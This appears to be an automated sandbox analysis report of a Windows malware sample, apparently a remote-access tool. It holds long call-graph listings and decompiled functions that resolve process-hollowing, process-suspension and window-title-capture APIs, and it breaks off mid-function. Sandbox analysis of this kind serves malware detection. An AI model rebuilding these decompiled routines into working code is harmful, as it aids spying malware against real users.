47882 40496f 47885 4049a4 47882->47885 47886 404974 47882->47886 47887 402073 28 API calls 47883->47887 48008 41f711 28 API calls 47885->48008 47890 402073 28 API calls 47886->47890 47891 40494e 47887->47891 47893 404983 47890->47893 47894 41a04a 79 API calls 47891->47894 47892 4049ac 47896 4049d9 CreateEventW CreateEventW 47892->47896 47898 402073 28 API calls 47892->47898 47897 402073 28 API calls 47893->47897 47895 404953 47894->47895 47999 41f5ab 47895->47999 47896->47852 47899 404992 47897->47899 47901 4049c2 47898->47901 47902 41a04a 79 API calls 47899->47902 47903 402073 28 API calls 47901->47903 47904 404997 47902->47904 47905 4049d1 47903->47905 48007 41f9bd 51 API calls 47904->48007 47907 41a04a 79 API calls 47905->47907 47908 4049d6 47907->47908 47908->47896 48012 41a311 GlobalMemoryStatusEx 47909->48012 47911 41a350 47911->47318 48013 4138c7 47912->48013 47916 44075d 47915->47916 48043 44054d 47916->48043 47918 44077e 47918->47318 47920 40d2a9 47919->47920 47921 4127e7 3 API calls 47920->47921 47923 40d2b0 47921->47923 47922 40d2c8 47922->47318 47923->47922 47924 412831 3 API calls 47923->47924 47924->47922 47926 402097 28 API calls 47925->47926 47927 41a7b2 47926->47927 47927->47318 47929 41a886 47928->47929 47930 402097 28 API calls 47929->47930 47931 41a898 47930->47931 47931->47318 47933 440751 20 API calls 47932->47933 47934 41a70d 47933->47934 47935 402073 28 API calls 47934->47935 47936 41a71b 47935->47936 47936->47318 47938 41a657 GetTickCount 47937->47938 47938->47349 47940 435760 ___scrt_fastfail 47939->47940 47941 41a610 GetForegroundWindow GetWindowTextW 47940->47941 47942 40415e 28 API calls 47941->47942 47943 41a63a 47942->47943 47943->47349 47944->47349 47945->47349 47946->47349 47948 4020bf 11 API calls 47947->47948 47949 404c07 47948->47949 47950 4020bf 11 API calls 47949->47950 47954 404c10 47950->47954 47951 43a620 ___std_exception_copy 21 API calls 47951->47954 47953 404c76 47953->47954 47956 404c81 47953->47956 47954->47951 47954->47953 47955 402097 28 API calls 47954->47955 47957 401fc2 28 API calls 47954->47957 47959 401fb8 11 API calls 47954->47959 48048 404ca3 47954->48048 48061 404b76 56 API calls 47954->48061 47955->47954 47958 404e06 98 API calls 47956->47958 47957->47954 47960 404c88 47958->47960 47959->47954 47961 401fb8 11 API calls 47960->47961 47962 404c91 47961->47962 47963 401fb8 11 API calls 47962->47963 47964 404c9a 47963->47964 47964->47325 47967 404e20 SetEvent CloseHandle 47966->47967 47968 404e37 closesocket 47966->47968 47969 404eb8 47967->47969 47970 404e44 47968->47970 47969->47318 47971 404e53 47970->47971 47972 404e5a 47970->47972 48062 4050c4 83 API calls 47971->48062 47974 404e6c WaitForSingleObject 47972->47974 47975 404eae SetEvent CloseHandle 47972->47975 47976 41f5ab 3 API calls 47974->47976 47975->47969 47977 404e7b SetEvent WaitForSingleObject 47976->47977 47978 41f5ab 3 API calls 47977->47978 47979 404e93 SetEvent FindCloseChangeNotification FindCloseChangeNotification 47978->47979 47979->47975 47980->47318 47982 4020bf 11 API calls 47981->47982 47983 41b46e FormatMessageA 47982->47983 47984 41b49a 47983->47984 47985 41b48c 47983->47985 47988 41b4a5 LocalFree 47984->47988 47986 402073 28 API calls 47985->47986 47987 41b498 47986->47987 47990 401fb8 11 API calls 47987->47990 47989 402035 11 API calls 47988->47989 47989->47987 47991 41b4c1 47990->47991 47991->47318 47993->47349 47994->47325 47995->47825 47996->47833 47998->47860 48000 41f5b3 47999->48000 48001 41d01c 47999->48001 48000->47852 48002 41d02a 48001->48002 48010 41c166 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48001->48010 48011 41cd4c DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48002->48011 48005 41d031 48006->47882 48007->47895 48008->47892 48010->48002 48011->48005 48012->47911 48016 41389a 48013->48016 48017 4138af ___scrt_initialize_default_local_stdio_options 48016->48017 48020 43e06d 48017->48020 48023 43adc0 48020->48023 48024 43ae00 48023->48024 48025 43ade8 48023->48025 48024->48025 48026 43ae08 48024->48026 48038 43eead 20 API calls __dosmaperr 48025->48038 48039 4390b7 35 API calls 3 library calls 48026->48039 48029 43aded pre_c_initialization 48031 4338bb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 48029->48031 48030 43ae18 48040 43b546 20 API calls 2 library calls 48030->48040 48033 4138bd 48031->48033 48033->47318 48034 43ae90 48041 43bbb4 50 API calls 3 library calls 48034->48041 48037 43ae9b 48042 43b5b0 20 API calls _free 48037->48042 48038->48029 48039->48030 48040->48034 48041->48037 48042->48029 48044 440564 48043->48044 48046 44059b pre_c_initialization 48044->48046 48047 43eead 20 API calls __dosmaperr 48044->48047 48046->47918 48047->48046 48049 4020bf 11 API calls 48048->48049 48060 404cbe 48049->48060 48050 404df3 48051 401fb8 11 API calls 48050->48051 48052 404dfc 48051->48052 48052->47953 48053 401fc2 28 API calls 48053->48060 48054 401fb8 11 API calls 48054->48060 48055 4020d6 28 API calls 48055->48060 48056 401fa0 28 API calls 48057 404d8d CreateEventA 48056->48057 48058 404dad WaitForSingleObject FindCloseChangeNotification 48057->48058 48058->48060 48059 404182 28 API calls 48059->48060 48060->48050 48060->48053 48060->48054 48060->48055 48060->48056 48060->48059 48061->47954 48062->47972 48063->47393 48064->47420 48065->47419 48066->47408 48067->47412 48068->47418 48069->47449 48074 40ed05 48072->48074 48073 412831 3 API calls 48073->48074 48074->48073 48075 40eda9 48074->48075 48077 40ed99 Sleep 48074->48077 48094 40ed37 48074->48094 48078 4086d0 28 API calls 48075->48078 48076 4086d0 28 API calls 48076->48094 48077->48074 48081 40edb4 48078->48081 48080 41a7b9 28 API calls 48080->48094 48082 41a7b9 28 API calls 48081->48082 48083 40edc0 48082->48083 48101 412afc 14 API calls 48083->48101 48086 401ee9 11 API calls 48086->48094 48087 40edd3 48088 401ee9 11 API calls 48087->48088 48090 40eddf 48088->48090 48089 402073 28 API calls 48089->48094 48091 402073 28 API calls 48090->48091 48092 40edf0 48091->48092 48095 412a57 14 API calls 48092->48095 48093 412a57 14 API calls 48093->48094 48094->48076 48094->48077 48094->48080 48094->48086 48094->48089 48094->48093 48099 40c5a4 111 API calls ___scrt_fastfail 48094->48099 48100 412afc 14 API calls 48094->48100 48096 40ee03 48095->48096 48102 411d93 TerminateProcess WaitForSingleObject 48096->48102 48098 40ee0b ExitProcess 48100->48094 48101->48087 48102->48098 48103 4252f1 48104 425306 48103->48104 48107 425398 48103->48107 48106 4253fd 48104->48106 48104->48107 48108 42544f 48104->48108 48110 425388 48104->48110 48112 425428 48104->48112 48113 425353 48104->48113 48118 4253c8 48104->48118 48131 4237e8 48 API calls _Yarn 48104->48131 48106->48112 48135 423ffb 21 API calls 48106->48135 48108->48107 48136 424a60 28 API calls 48108->48136 48110->48107 48110->48118 48133 4237e8 48 API calls _Yarn 48110->48133 48112->48107 48112->48108 48119 4243ec 48112->48119 48113->48107 48113->48110 48132 41e477 51 API calls 48113->48132 48118->48106 48118->48107 48134 41e477 51 API calls 48118->48134 48121 42440b ___scrt_fastfail 48119->48121 48120 42441f 48126 424428 48120->48126 48127 42443f 48120->48127 48139 41c36a 48 API calls 48120->48139 48123 42441a 48121->48123 48121->48127 48137 41d4c6 21 API calls 48121->48137 48123->48120 48123->48127 48138 41eee3 45 API calls 48123->48138 48126->48127 48140 423610 21 API calls 2 library calls 48126->48140 48127->48108 48129 4244c2 48129->48127 48130 4317cf 21 API calls 48129->48130 48130->48120 48131->48113 48132->48113 48133->48118 48134->48118 48135->48112 48136->48107 48137->48123 48138->48129 48139->48126 48140->48127 48141 425556 48146 4255d3 send 48141->48146 48147 409876 48152 409a7a 48147->48152 48155 409a8e ___scrt_fastfail 48152->48155 48153 401e45 22 API calls 48153->48155 48154 40415e 28 API calls 48154->48155 48155->48153 48155->48154 48157 409ad0 Sleep 48155->48157 48167 409add 48155->48167 48170 41aeca GetForegroundWindow GetWindowTextLengthW 48155->48170 48157->48155 48158 4042dc 78 API calls 48158->48167 48159 402ff4 28 API calls 48159->48167 48160 401ef3 28 API calls 48160->48167 48161 401ee9 11 API calls 48161->48167 48162 4086d0 28 API calls 48162->48167 48164 401e45 22 API calls 48164->48167 48165 40415e 28 API calls 48165->48167 48166 41aeca 31 API calls 48166->48167 48167->48155 48167->48158 48167->48159 48167->48160 48167->48161 48167->48162 48167->48164 48167->48165 48167->48166 48168 409b6e Sleep 48167->48168 48194 40977e 85 API calls 48167->48194 48195 40a64f 83 API calls 48167->48195 48168->48167 48171 41aef5 48170->48171 48193 41afc7 48170->48193 48172 40ae7e 28 API calls 48171->48172 48174 41af01 48172->48174 48173 401ee9 11 API calls 48175 41afcf 48173->48175 48176 41af0b GetWindowTextW 48174->48176 48175->48155 48177 41af21 48176->48177 48178 40415e 28 API calls 48177->48178 48179 41af5f 48178->48179 48180 4086d0 28 API calls 48179->48180 48181 41af6d 48180->48181 48196 41aa44 48181->48196 48183 41afb5 48218 406150 11 API calls 48183->48218 48185 41afbe 48187 401ee9 11 API calls 48185->48187 48186 401e45 22 API calls 48188 41af76 48186->48188 48187->48193 48188->48183 48188->48186 48191 41afd8 48188->48191 48190 41affb 48192 401ee9 11 API calls 48190->48192 48219 406150 11 API calls 48191->48219 48192->48193 48193->48173 48194->48167 48195->48167 48197 401f66 11 API calls 48196->48197 48217 41aa57 48197->48217 48198 41aac7 48199 401ee9 11 API calls 48198->48199 48200 41aaf9 48199->48200 48201 401ee9 11 API calls 48200->48201 48203 41ab01 48201->48203 48202 41aac9 48222 408682 28 API calls 48202->48222 48206 401ee9 11 API calls 48203->48206 48208 41ab09 48206->48208 48207 41aad5 48209 401ef3 28 API calls 48207->48209 48208->48188 48211 41aade 48209->48211 48210 401ef3 28 API calls 48210->48217 48213 401ee9 11 API calls 48211->48213 48212 401ee9 11 API calls 48212->48217 48214 41aae6 48213->48214 48223 40be24 28 API calls 48214->48223 48217->48198 48217->48202 48217->48210 48217->48212 48220 408682 28 API calls 48217->48220 48221 40be24 28 API calls 48217->48221 48218->48185 48219->48190 48220->48217 48221->48217 48222->48207 48223->48198 48224 441ffe 48225 442007 48224->48225 48226 442020 48224->48226 48227 44200f 48225->48227 48231 44205c 48225->48231 48229 442017 48229->48227 48244 442303 22 API calls 2 library calls 48229->48244 48232 442065 48231->48232 48233 442068 48231->48233 48232->48229 48234 44d8d9 48 API calls 48233->48234 48235 44206f 48234->48235 48245 44dbda GetEnvironmentStringsW 48235->48245 48239 445002 _free 20 API calls 48240 4420af 48239->48240 48240->48229 48241 442085 48242 445002 _free 20 API calls 48241->48242 48243 44207a 48242->48243 48243->48239 48244->48226 48246 44dbf1 48245->48246 48256 44dc44 48245->48256 48249 44dbf7 WideCharToMultiByte 48246->48249 48247 442074 48247->48243 48257 442109 26 API calls 4 library calls 48247->48257 48248 44dc4d FreeEnvironmentStringsW 48248->48247 48250 44dc13 48249->48250 48249->48256 48258 444a38 21 API calls 3 library calls 48250->48258 48252 44dc19 48253 44dc20 WideCharToMultiByte 48252->48253 48254 44dc36 48252->48254 48253->48254 48255 445002 _free 20 API calls 48254->48255 48255->48256 48256->48247 48256->48248 48257->48241 48258->48252 48259 414e1c 48260 4020d6 28 API calls 48259->48260 48261 414e3e SetEvent 48260->48261 48262 414e53 48261->48262 48263 404182 28 API calls 48262->48263 48264 414e6d 48263->48264 48265 4020d6 28 API calls 48264->48265 48266 414e7d 48265->48266 48267 4020d6 28 API calls 48266->48267 48268 414e8f 48267->48268 48269 41a976 28 API calls 48268->48269 48270 414e98 48269->48270 48271 415bc2 48270->48271 48272 414ea8 48270->48272 48276 415ca0 48271->48276 48277 415c02 48271->48277 48278 415d55 48271->48278 48279 415f24 48271->48279 48280 415c27 48271->48280 48281 415ee8 48271->48281 48282 415d0b 48271->48282 48283 415e71 48271->48283 48284 415e91 48271->48284 48285 415d30 48271->48285 48286 415f99 48271->48286 48287 415f38 48271->48287 48288 415e9b 48271->48288 48289 415e1a 48271->48289 48290 415f1a 48271->48290 48291 415d9d 48271->48291 48292 415dbd 48271->48292 48293 415ddd 48271->48293 48294 415bdf 48271->48294 48389 415bfa 48271->48389 48273 415ac9 48272->48273 48274 414eae 48272->48274 48524 4162bc 14 API calls 48273->48524 48297 414ec1 GetTickCount 48274->48297 48274->48389 48516 415023 48274->48516 48275 401e6d 11 API calls 48311 416121 48275->48311 48532 4081d8 14 API calls 48276->48532 48318 401e45 22 API calls 48277->48318 48298 401e45 22 API calls 48278->48298 48545 419991 60 API calls 48279->48545 48301 401e45 22 API calls 48280->48301 48303 401e45 22 API calls 48281->48303 48313 401e45 22 API calls 48282->48313 48317 401e45 22 API calls 48283->48317 48541 4199d8 124 API calls 48284->48541 48315 401e45 22 API calls 48285->48315 48548 405b0b 49 API calls 48286->48548 48309 415f77 48287->48309 48328 401e45 22 API calls 48287->48328 48299 415ea4 48288->48299 48300 415ec9 ShowWindow SetForegroundWindow 48288->48300 48312 401e45 22 API calls 48289->48312 48544 419872 104 API calls 48290->48544 48304 401e45 22 API calls 48291->48304 48306 401e45 22 API calls 48292->48306 48310 401e45 22 API calls 48293->48310 48316 401e45 22 API calls 48294->48316 48319 41a6e9 28 API calls 48297->48319 48320 415d70 48298->48320 48542 41b6a6 86 API calls ___scrt_fastfail 48299->48542 48300->48389 48322 415c32 48301->48322 48302 415ad5 48323 401e45 22 API calls 48302->48323 48324 415ef5 48303->48324 48325 415da8 48304->48325 48326 415dc8 48306->48326 48546 406d6c RegCreateKeyA RegSetValueExA RegCloseKey 48309->48546 48329 415dea 48310->48329 48330 401fb8 11 API calls 48311->48330 48332 415e26 48312->48332 48333 415d16 48313->48333 48335 415d3b 48315->48335 48336 415bea 48316->48336 48337 415e7c 48317->48337 48338 415c0d 48318->48338 48339 414ed2 48319->48339 48365 401e45 22 API calls 48320->48365 48353 415c39 StrToIntA 48322->48353 48342 415ae0 48323->48342 48367 401e45 22 API calls 48324->48367 48343 4020d6 28 API calls 48325->48343 48344 4020d6 28 API calls 48326->48344 48327 415cac 48345 401e45 22 API calls 48327->48345 48346 415f4c 48328->48346 48372 402073 28 API calls 48329->48372 48347 41612d 48330->48347 48375 415e52 48332->48375 48376 415e3b 48332->48376 48377 43a3ac _strftime 39 API calls 48333->48377 48334 415fa2 48349 401e45 22 API calls 48334->48349 48379 43a3ac _strftime 39 API calls 48335->48379 48350 4020d6 28 API calls 48336->48350 48351 4020d6 28 API calls 48337->48351 48363 43a3ac _strftime 39 API calls 48338->48363 48352 41a641 GetTickCount 48339->48352 48341 415007 48341->48389 48387 43a3ac _strftime 39 API calls 48342->48387 48354 415db3 48343->48354 48355 415dd3 48344->48355 48356 415cb7 48345->48356 48357 41a6e9 28 API calls 48346->48357 48358 401fb8 11 API calls 48347->48358 48348 415f87 48359 415f8f 48348->48359 48348->48389 48360 415fad 48349->48360 48361 415bf5 48350->48361 48362 415e87 48351->48362 48364 414ede 48352->48364 48366 401e45 22 API calls 48353->48366 48537 418608 124 API calls 48354->48537 48538 403f08 124 API calls 48355->48538 48370 4020d6 28 API calls 48356->48370 48371 415f62 48357->48371 48373 416139 48358->48373 48547 40cd03 55 API calls 48359->48547 48378 401e45 22 API calls 48360->48378 48361->48389 48528 4071bd 124 API calls 48361->48528 48540 416495 125 API calls 48362->48540 48383 415c1a 48363->48383 48384 41a6e9 28 API calls 48364->48384 48385 415d83 48365->48385 48386 415c4d 48366->48386 48388 415f0c 48367->48388 48390 415cc2 48370->48390 48391 402ef0 28 API calls 48371->48391 48392 415dfc 48372->48392 48394 401e45 22 API calls 48375->48394 48393 401e45 22 API calls 48376->48393 48395 415d23 48377->48395 48396 415fba 48378->48396 48397 415d48 48379->48397 48382 415e8c 48529 409003 22 API calls 48383->48529 48399 414ee9 48384->48399 48417 43a3ac _strftime 39 API calls 48385->48417 48418 40cf38 31 API calls 48386->48418 48400 415aed 48387->48400 48543 419970 28 API calls 48388->48543 48389->48275 48402 401e45 22 API calls 48390->48402 48403 415f6d 48391->48403 48421 412a57 14 API calls 48392->48421 48404 415e40 48393->48404 48405 415e57 48394->48405 48535 41a664 OpenProcess CloseHandle 48395->48535 48549 402f11 28 API calls 48396->48549 48536 41a690 OpenProcess CloseHandle 48397->48536 48409 41a5f1 30 API calls 48399->48409 48525 41689b 28 API calls 48400->48525 48411 415ccd 48402->48411 48412 402ef0 28 API calls 48403->48412 48413 4020d6 28 API calls 48404->48413 48414 4020d6 28 API calls 48405->48414 48416 414ef7 48409->48416 48420 4020d6 28 API calls 48411->48420 48412->48309 48422 415e4b 48413->48422 48414->48422 48415 415fc5 48423 402ef0 28 API calls 48415->48423 48424 41a879 28 API calls 48416->48424 48425 415d90 SetWindowTextW 48417->48425 48426 415c60 48418->48426 48419 415b07 48434 401e45 22 API calls 48419->48434 48427 415cd8 48420->48427 48421->48389 48539 4162cd 121 API calls 48422->48539 48428 415fd1 48423->48428 48429 414f05 48424->48429 48425->48291 48438 401e45 22 API calls 48426->48438 48430 401e45 22 API calls 48427->48430 48550 405eda 118 API calls 48428->48550 48433 401e45 22 API calls 48429->48433 48435 415ce3 48430->48435 48437 414f13 48433->48437 48439 415b1a 48434->48439 48440 4020d6 28 API calls 48435->48440 48436 415fdd 48441 401fb8 11 API calls 48436->48441 48517 402f11 28 API calls 48437->48517 48443 415c77 48438->48443 48444 4020d6 28 API calls 48439->48444 48445 415cee 48440->48445 48446 415fe6 48441->48446 48530 41ae6b CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48443->48530 48449 415b25 48444->48449 48533 40647b 124 API calls 48445->48533 48451 41610f 48446->48451 48452 401fb8 11 API calls 48446->48452 48447 414f21 48518 402e81 28 API calls 48447->48518 48455 401e45 22 API calls 48449->48455 48462 401fb8 11 API calls 48451->48462 48452->48451 48454 415c80 48464 415c92 48454->48464 48531 41b35b 32 API calls 48454->48531 48458 415b30 48455->48458 48456 415cfa 48534 4081e6 98 API calls 48456->48534 48457 414f30 48460 402ef0 28 API calls 48457->48460 48461 4020d6 28 API calls 48458->48461 48463 414f3f 48460->48463 48466 415b3b 48461->48466 48462->48389 48519 402e81 28 API calls 48463->48519 48469 401ee9 11 API calls 48464->48469 48468 401e45 22 API calls 48466->48468 48471 415b46 48468->48471 48469->48389 48470 414f4e 48472 402ef0 28 API calls 48470->48472 48475 40415e 28 API calls 48471->48475 48473 414f5a 48472->48473 48520 402e81 28 API calls 48473->48520 48477 415b58 48475->48477 48476 414f64 48521 404a81 60 API calls _Yarn 48476->48521 48479 401e45 22 API calls 48477->48479 48481 415b63 48479->48481 48480 414f73 48482 401fb8 11 API calls 48480->48482 48485 40415e 28 API calls 48481->48485 48483 414f7c 48482->48483 48484 401fb8 11 API calls 48483->48484 48486 414f88 48484->48486 48487 415b75 48485->48487 48488 401fb8 11 API calls 48486->48488 48526 408909 126 API calls 2 library calls 48487->48526 48490 414f94 48488->48490 48491 401fb8 11 API calls 48490->48491 48492 414fa0 48491->48492 48494 401fb8 11 API calls 48492->48494 48496 414fac 48494->48496 48495 415b81 48527 40905e 98 API calls 48495->48527 48497 401fb8 11 API calls 48496->48497 48498 414fb8 48497->48498 48499 401ee9 11 API calls 48498->48499 48500 414fc4 48499->48500 48501 401fb8 11 API calls 48500->48501 48502 414fcd 48501->48502 48503 401fb8 11 API calls 48502->48503 48504 414fd6 48503->48504 48505 401e45 22 API calls 48504->48505 48506 414fe1 48505->48506 48507 43a3ac _strftime 39 API calls 48506->48507 48508 414fee 48507->48508 48509 414ff3 48508->48509 48510 415019 48508->48510 48512 415001 48509->48512 48513 41500c 48509->48513 48511 401e45 22 API calls 48510->48511 48511->48516 48522 404fd4 81 API calls 48512->48522 48515 404f31 81 API calls 48513->48515 48515->48341 48516->48389 48523 4050c4 83 API calls 48516->48523 48517->48447 48518->48457 48519->48470 48520->48476 48521->48480 48522->48341 48523->48341 48524->48302 48525->48419 48526->48495 48527->48341 48528->48389 48529->48389 48530->48454 48531->48464 48532->48327 48533->48456 48534->48389 48535->48341 48536->48341 48539->48389 48540->48382 48541->48389 48542->48341 48543->48389 48544->48341 48545->48389 48546->48348 48547->48341 48548->48334 48549->48415 48550->48436 48551 40163e 48552 401646 48551->48552 48553 401649 48551->48553 48554 401688 48553->48554 48556 401676 48553->48556 48555 432df5 new 22 API calls 48554->48555 48557 40167c 48555->48557 48558 432df5 new 22 API calls 48556->48558 48558->48557

                    Executed Functions

                    Function 0041B4C9 Relevance: 117.4, APIs: 40, Strings: 27, Instructions: 143libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E0041B4C9() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t30;
				_Unknown_base(*)()* _t34;
				CHAR* _t42;
				CHAR* _t45;
				CHAR* _t46;
				CHAR* _t47;
				CHAR* _t48;
				CHAR* _t49;

				_t45 = "GetModuleFileNameExA";
				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, _t45);
				 *0x472b00 = _t2;
				if(_t2 == 0) {
					 *0x472b00 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t45);
				}
				_t46 = "GetModuleFileNameExW";
				 *0x472af8 = GetProcAddress(LoadLibraryA("Psapi.dll"), _t46);
				if( *0x472b00 == 0) {
					 *0x472af8 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t46);
				}
				_t6 = GetProcAddress(GetModuleHandleA("shcore"), "SetProcessDpiAwareness");
				 *0x472ad8 = _t6;
				if(_t6 == 0) {
					 *0x472adc = GetProcAddress(GetModuleHandleA("user32"), "SetProcessDpiAware");
				}
				GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				_t10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				_t47 = "kernel32";
				 *0x472aec = _t10;
				 *0x472af4 = GetProcAddress(GetModuleHandleA(_t47), "IsWow64Process");
				 *0x472afc = GetProcAddress(GetModuleHandleA(_t47), "GetComputerNameExW");
				 *0x472ae8 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				_t18 = GetProcAddress(GetModuleHandleA(_t47), "SetProcessDEPPolicy");
				_t48 = "user32";
				 *0x472ae0 = _t18;
				 *0x472ad0 = GetProcAddress(GetModuleHandleA(_t48), "EnumDisplayDevicesW");
				 *0x472ad4 = GetProcAddress(GetModuleHandleA(_t48), "EnumDisplayMonitors");
				_t24 = GetProcAddress(GetModuleHandleA(_t48), "GetMonitorInfoW");
				_t49 = "kernel32.dll";
				 *0x472b18 = _t24;
				 *0x472b08 = GetProcAddress(GetModuleHandleA(_t49), "GetSystemTimes");
				 *0x472b14 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				_t30 = GetProcAddress(LoadLibraryA(_t49), "GetConsoleWindow");
				_t42 = "ntdll";
				 *0x472b0c = _t30;
				 *0x472b04 = GetProcAddress(GetModuleHandleA(_t42), "NtSuspendProcess");
				_t34 = GetProcAddress(GetModuleHandleA(_t42), "NtResumeProcess");
				 *0x472af0 = _t34;
				return _t34;
			}

















                    0x0041b4d3
                    0x0041b4de
                    0x0041b4e7
                    0x0041b4ef
                    0x0041b4f6
                    0x0041b503
                    0x0041b503
                    0x0041b508
                    0x0041b51f
                    0x0041b524
                    0x0041b531
                    0x0041b531
                    0x0041b543
                    0x0041b545
                    0x0041b54c
                    0x0041b55d
                    0x0041b55d
                    0x0041b56f
                    0x0041b57e
                    0x0041b585
                    0x0041b58a
                    0x0041b59b
                    0x0041b5af
                    0x0041b5bf
                    0x0041b5c7
                    0x0041b5ce
                    0x0041b5d3
                    0x0041b5e4
                    0x0041b5f4
                    0x0041b5fc
                    0x0041b603
                    0x0041b608
                    0x0041b61a
                    0x0041b62a
                    0x0041b632
                    0x0041b639
                    0x0041b63e
                    0x0041b649
                    0x0041b657
                    0x0041b65c
                    0x0041b662

                    APIs
                    • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4DE
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B4E7
                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4FE
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B501
                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B513
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B516
                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B52C
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B52F
                    • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040DEE5), ref: 0041B540
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B543
                    • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040DEE5), ref: 0041B558
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B55B
                    • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040DEE5), ref: 0041B56C
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B56F
                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040DEE5), ref: 0041B57B
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B57E
                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040DEE5), ref: 0041B590
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B593
                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040DEE5), ref: 0041B5A0
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5A3
                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040DEE5), ref: 0041B5B4
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5B7
                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040DEE5), ref: 0041B5C4
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5C7
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040DEE5), ref: 0041B5D9
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5DC
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040DEE5), ref: 0041B5E9
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5EC
                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040DEE5), ref: 0041B5F9
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B5FC
                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040DEE5), ref: 0041B60E
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B611
                    • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040DEE5), ref: 0041B61F
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B622
                    • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040DEE5), ref: 0041B62F
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B632
                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040DEE5), ref: 0041B644
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B647
                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040DEE5), ref: 0041B654
                    • GetProcAddress.KERNEL32(00000000), ref: 0041B657
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleModule$LibraryLoad
                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll$ntdll.dll$shcore$user32
                    • API String ID: 551388010-626199206
                    • Opcode ID: d2d1844e2719a9dcaac12d858f5210b20b1b817276e2085d58da0c67cb1bf55f
                    • Instruction ID: 5a53dc12768b909e1e2e060ec693a1e80cbb19dbcc6530350e1da79dd032a68e
                    • Opcode Fuzzy Hash: d2d1844e2719a9dcaac12d858f5210b20b1b817276e2085d58da0c67cb1bf55f
                    • Instruction Fuzzy Hash: C441EEA0E407187AD620BFB65D49E1B3E9CEA41B547110837B508B3551FAFCA8908F6F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040ECEA Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 88sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 56%
                    			E0040ECEA() {
				signed int _v32;
				void* _t13;
				void* _t22;
				char* _t34;
				void* _t63;
				signed int _t64;
				void* _t66;
				void* _t67;
				void* _t69;

				_t66 = (_t64 & 0xfffffff8) - 0x1c;
				_t34 = L"pth_unenc";
				while(1) {
					_v32 = _v32 & 0x00000000;
